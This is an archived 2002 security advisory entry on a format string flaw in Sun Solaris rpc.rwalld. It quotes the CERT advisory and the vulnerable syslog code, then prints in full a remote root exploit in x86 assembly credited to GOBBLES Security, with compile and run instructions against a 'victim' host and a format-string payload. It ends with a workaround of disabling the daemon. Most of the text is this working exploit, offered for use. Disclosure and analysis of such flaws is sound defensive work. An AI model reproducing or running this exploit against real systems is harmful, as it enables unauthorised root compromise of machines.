26th Sep 2002 [SBWID-5319]
COMMAND
Sun rpc.rwalld format string vulnerability
SYSTEMS AFFECTED
Sun Solaris 2.5.1, 2.6, 7, and 8
PROBLEM
In CERT [http://www.cert.org/] advisory [CA-2002-10] :
-snapp-
rpc.rwalld is a utility that listens for remote wall requests. Wall is
used to send a message to all terminals of a time-sharing system. If
the wall command cannot be executed, the rwall daemon will display an
error message.
An intruder can consume system resources and potentially prevent wall
from executing, which would trigger the rwall daemon's error message.
A format string vulnerability exists in the code that displays the
error message. This vulnerability may permit the intruder to execute
code with the privileges of the rwall daemon.
This vulnerability may be exploited both locally and remotely,
although remote exploitation is significantly more difficult.
-snipp-
In GOBBLES security advisory [#32] who originally reported the bug,
they added the following comments to the faulty code :
/*
* Make sure the wall programs exists, is executeable, and runs
*/
if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||
(fp = popen(WALL_PROG, "w")) == NULL) {
syslog(LOG_NOTICE,
"rwall message received but could not execute %s",
WALL_PROG);
syslog(LOG_NOTICE, msg);
Bug easy enough to spot, but now question is, "GOBBLES, friend, how is
this to be exploited? Faulty syslog() only called if rpc.rwalld can not
execute /usr/sbin/wall on local system, which mean it only exploitable
if admin have chmod -x or rm /usr/sbin/wall or something like this,
right, so why this so such a big deal?"
To this GOBBLES say, "Friend IDIOT, faulty syslog() is called if
anything is to make popen() fail, there one other way to exploit bug,
which make it dangerous and affect all installation of Solaris running
rpc.rwalld, is that popen() to fail if there no available file
descriptors on system."
This easier to exploit locally on system. For remote exploitation,
timing is important and thus is race condition. Each new tcp session to
running service on target host will consume filedescriptor.
And the "not so exploitable" exploit :
/*
Remote Root Exploit for Solaris 6-8 rpc.walld
Usage Instructions:
1. Compile.
gcc -o xwall xwall.s
2. Run.
(./xwall ; ./shellcode) | rwall victim
3. Late Easter egg.
strings xwall
Note(s):
Something else must be done to consume FD's on
victim system. Figure this one out for self.
This exploit written to be run on Linux. Supplied
format string is for Sparc Solaris. Provide own
remote shellcode and use as above described.
Love,
GOBBLES Security
http://www.bugtraq.org
[email protected]
*/
retloc:
.long 0x41424344
retaddr:
.long 0x60bb135
padding:
.long 4
walkcount:
.long 1
.globl main
.type main,@function
main:
pusha
movl (padding),%ecx
jusfhds7fg:
pushl %ecx
movl $4,%eax
movl $1,%ebx
pushl $0x00000041
movl %esp,%ecx
movl $1,%edx
int $0x80
popl %ecx
popl %ecx
loop jusfhds7fg
movl %esp,24(%esp)
pushl $0x42424242
movl $4,%edx
movl %esp,%ecx
movl $1,%ebx
movl $4,%eax
int $0x80
movl (retloc),%eax
bswapl %eax
pushl %eax
subl $4,%ecx
movl %edx,%eax
int $0x80
addl $4,%ecx
movl %edx,%eax
int $0x80
subl $4,%ecx
popl %eax
bswapl %eax
incl %eax
incl %eax
bswapl %eax
pushl %eax
movl %edx,%eax
int $0x80
popl %eax
movl %esp,%edx
incl %edx
xorl %esi,101(%ebp)
andb %al,111(%edx)
popa
pushl %edx
andb %al,97(%ebx)
decl %esi
aaa
andb %al,111(%ebx)
incl %esp
xorl (%ecx),%eax
movl (walkcount),%ecx
cmpl $0,%ecx
je nczxhczjcg89zg89
pushl %ecx
movl $4,%edx
movl $1,%ebx
pushl $0x78382e25
cmzxnczxcz8c:
pushl %ecx
movl %esp,%ecx
addl $4,%ecx
movl $4,%eax
int $0x80
popl %ecx
loop cmzxnczxcz8c
popl %ecx
popl %ecx
nczxhczjcg89zg89:
movl (retaddr),%edx
pushl %edx
shr $16,%edx
subl %edx,(%esp)
movw $0,2(%esp)
pushl %edx
shll $3,%ecx
subl %ecx,(%esp)
movl (padding),%edx
subl %edx,(%esp)
subl $16,(%esp)
movw $0,2(%esp)
pushl $cznxczxczxh8
call printf
movl $1,%eax
int $0x80
cznxczxczxh8:
.string "%%%uc%%hn%%%uc%%hn\n"
SOLUTION
Disabling rpc.rwalld in inetd.conf is the recommended workaround until
patches are available.